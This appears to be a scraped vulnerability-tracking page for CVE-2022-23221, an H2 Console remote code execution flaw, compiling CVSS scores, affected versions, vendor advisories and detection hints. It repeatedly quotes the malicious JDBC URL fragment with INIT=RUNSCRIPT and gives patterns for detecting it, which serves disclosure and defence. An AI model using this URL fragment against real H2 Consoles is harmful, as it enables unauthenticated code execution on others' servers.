CVE-2022-23221
published 2022-01-19CVE-2022-23221: H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the…
PriorityP270critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
64.77%
99.1th percentile
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | h2database | < h2database 2.1.210-1 (bookworm) | h2database 2.1.210-1 (bookworm) |
| h2database | h2 | >= 1.1.100 < 2.0.206 | 2.0.206 |
| oracle | communications_cloud_native_core_console | — | — |
Detection & IOCsextracted from sources · hover to see the quote
otherjdbc:h2:mem JDBC URL containing IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT↗
- →Detect exploitation attempts by monitoring HTTP requests to the H2 Console containing the malicious JDBC URL pattern with IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT in the connection string. ↗
- →The vulnerability is remotely exploitable over HTTP with no authentication required; monitor H2 Console HTTP endpoints for crafted connection URL submissions. ↗
- →Flag any JDBC connection URL submitted to the H2 Console that includes the INIT=RUNSCRIPT directive, as this enables remote script execution. ↗
- ·The vulnerability only affects H2 Console versions before 2.1.210; systems running 2.1.210 or later are not affected. ↗
- ·This is a distinct vulnerability from CVE-2021-42392, which involves deserialization of untrusted data in H2; both affect H2 but via different attack vectors. ↗
- ·Exploitation is specifically via the H2 Console interface over HTTP; deployments that do not expose the H2 Console remotely have a reduced attack surface. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_oracle9.8CRITICAL
vendor_redhat9.8CRITICAL
vendor_ubuntu9.8CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
H2 vulnerabilities
vendor_ubuntu·2024-06-13·CVSS 9.8
CVE-2021-42392 [CRITICAL] H2 vulnerabilities
Title: H2 vulnerabilities
Summary: H2 could be made to allow arbitrary code execution.
It was discovered that H2 was vulnerable to deserialization of
untrusted data. An attacker could possibly use this issue to
execute arbitrary code. (CVE-2021-42392)
It was discovered that H2 incorrectly handled some specially
crafted connection URLs. An attacker could possibly use this
issue to execute arbitrary code. (CVE-2022-23221)
Instructions: In general, a standard system update will make all the necessary changes.
Oracle
Oracle Oracle Fusion Middleware Risk Matrix: B2B Engine (H2 Database) — CVE-2022-23221
vendor_oracle·2024-01-15·CVSS 9.8
CVE-2022-23221 [CRITICAL] Oracle Oracle Fusion Middleware Risk Matrix: B2B Engine (H2 Database) — CVE-2022-23221
Oracle Oracle Fusion Middleware Risk Matrix: B2B Engine (H2 Database) vulnerability
CVE: CVE-2022-23221
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2024 (JAN 2024)
Oracle
Oracle Oracle HealthCare Applications Risk Matrix: Data Studio (H2 Database) — CVE-2022-23221
vendor_oracle·2023-01-15·CVSS 9.8
CVE-2022-23221 [CRITICAL] Oracle Oracle HealthCare Applications Risk Matrix: Data Studio (H2 Database) — CVE-2022-23221
Oracle Oracle HealthCare Applications Risk Matrix: Data Studio (H2 Database) vulnerability
CVE: CVE-2022-23221
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2023 (JAN 2023)
Oracle
Oracle Oracle Communications Risk Matrix: CNC Console (H2) — CVE-2022-23221
vendor_oracle·2022-04-15·CVSS 9.8
CVE-2022-23221 [CRITICAL] Oracle Oracle Communications Risk Matrix: CNC Console (H2) — CVE-2022-23221
Oracle Oracle Communications Risk Matrix: CNC Console (H2) vulnerability
CVE: CVE-2022-23221
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuapr2022 (APR 2022)
Ubuntu
H2 vulnerabilities
vendor_ubuntu·2022-04-05·CVSS 9.8
CVE-2021-42392 [CRITICAL] H2 vulnerabilities
Title: H2 vulnerabilities
Summary: Several security issues were fixed in H2.
It was discovered that H2 was vulnerable to deserialization of
untrusted data. An attacker could possibly use this issue to
execute arbitrary code. (CVE-2021-42392)
It was discovered that H2 incorrectly handled some specially
crafted connection URLs. An attacker could possibly use this
issue to execute arbitrary code. (CVE-2022-23221)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
h2: Loading of custom classes from remote servers through JNDI
vendor_redhat·2022-01-19·CVSS 9.8
CVE-2022-23221 [CRITICAL] CWE-502 h2: Loading of custom classes from remote servers through JNDI
h2: Loading of custom classes from remote servers through JNDI
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
A flaw was found in the H2 Console. This flaw allows remote attackers to execute arbitrary code via a JDBC URL, concatenating with a substring that allows remote code execution by using a script.
Statement: In OpenShift Container Platform (OCP) the openshift-enterprise-3.11/metrics-hawkular-metrics-container container image ships a vulnerable version of h2 as part of the underlying images, but as it uses standard configuration and Console is not enabled/started by default, therefore the
Debian
CVE-2022-23221: h2database - H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via ...
vendor_debian·2022·CVSS 9.8
CVE-2022-23221 [CRITICAL] CVE-2022-23221: h2database - H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via ...
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
Scope: local
bookworm: resolved (fixed in 2.1.210-1)
bullseye: resolved (fixed in 1.4.197-4+deb11u1)
forky: resolved (fixed in 2.1.210-1)
sid: resolved (fixed in 2.1.210-1)
trixie: resolved (fixed in 2.1.210-1)
OSV
h2database vulnerabilities
osv·2022-04-05·CVSS 9.8
CVE-2021-42392 [CRITICAL] h2database vulnerabilities
h2database vulnerabilities
It was discovered that H2 was vulnerable to deserialization of
untrusted data. An attacker could possibly use this issue to
execute arbitrary code. (CVE-2021-42392)
It was discovered that H2 incorrectly handled some specially
crafted connection URLs. An attacker could possibly use this
issue to execute arbitrary code. (CVE-2022-23221)
OSV
Arbitrary code execution in H2 Console
osv·2022-01-21·CVSS 9.8
CVE-2022-23221 [CRITICAL] Arbitrary code execution in H2 Console
Arbitrary code execution in H2 Console
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
GHSA
Arbitrary code execution in H2 Console
ghsa·2022-01-21·CVSS 9.8
CVE-2022-23221 [CRITICAL] CWE-88 Arbitrary code execution in H2 Console
Arbitrary code execution in H2 Console
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
OSV
CVE-2022-23221: H2 Console before 2
osv·2022-01-19·CVSS 9.8
CVE-2022-23221 [CRITICAL] CVE-2022-23221: H2 Console before 2
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
No detection rules found.
No public exploits indexed.
Qualys
Oracle Patch Update, January 2024 Security Update Review
blogs_qualys·2024-01-17
Oracle Patch Update, January 2024 Security Update Review
## Table of Contents
Qualys QID Coverage
Notable Oracle Vulnerabilities Patched
Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Oracle has released its first quarterly edition of Critical Patch Update, which contains patches for 389 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in a wide range of product families, including Oracle code and third-party components included in Oracle products.
In the first quarterly Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of patches, 71, constituting 18% of the total patches released. Oracle Communications and Oracle Communications Applications follow
Qualys
Oracle Patch Update, January 2024 Security Update Review | Qualys
blogs_qualys·2024-01-17
Oracle Patch Update, January 2024 Security Update Review | Qualys
#### Table of Contents
- Qualys QID Coverage
- Notable Oracle Vulnerabilities Patched
- Discover and Prioritize Vulnerabilities in Vulnerability Management, Detection & Response (VMDR)
Oracle has released its first quarterly edition of Critical Patch Update, which contains patches for 389 security vulnerabilities. Some of the vulnerabilities addressed in this update impact more than one product. These patches address vulnerabilities in a wide range of product families, including Oracle code and third-party components included in Oracle products.
In the first quarterly Oracle Critical Patch Update, Oracle Financial Services Applications received the highest number of patches, 71, constituting 18% of the total patches released. Oracle Communications and Oracle Communications Applications
Bugzilla
CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI
bugzilla·2022-01-24·CVSS 9.8
CVE-2022-23221 [CRITICAL] CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI
CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
https://github.com/h2database/h2database/security/advisories
https://github.com/h2database/h2database/releases/tag/version-2.1.210
https://twitter.com/d0nkey_man/status/1483824727936450564
Discussion:
This issue has been addressed in the following products:
Red Hat JBoss Enterprise Application Platform
Via RHSA-2022:4922 https://access.redhat.com/errata/RHSA-2022:4922
---
This issue has been addressed in the following products:
Red Hat JBoss Enterprise Application Pl
http://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Jan/39https://github.com/h2database/h2database/releases/tag/version-2.1.210https://github.com/h2database/h2database/security/advisorieshttps://lists.debian.org/debian-lts-announce/2022/02/msg00017.htmlhttps://security.netapp.com/advisory/ntap-20230818-0011/https://twitter.com/d0nkey_man/status/1483824727936450564https://www.debian.org/security/2022/dsa-5076https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.oracle.com/security-alerts/cpujul2022.htmlhttp://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2022/Jan/39https://github.com/h2database/h2database/releases/tag/version-2.1.210https://github.com/h2database/h2database/security/advisorieshttps://lists.debian.org/debian-lts-announce/2022/02/msg00017.htmlhttps://security.netapp.com/advisory/ntap-20230818-0011/https://twitter.com/d0nkey_man/status/1483824727936450564https://www.debian.org/security/2022/dsa-5076https://www.oracle.com/security-alerts/cpuapr2022.htmlhttps://www.oracle.com/security-alerts/cpujul2022.html
2022-01-19
Published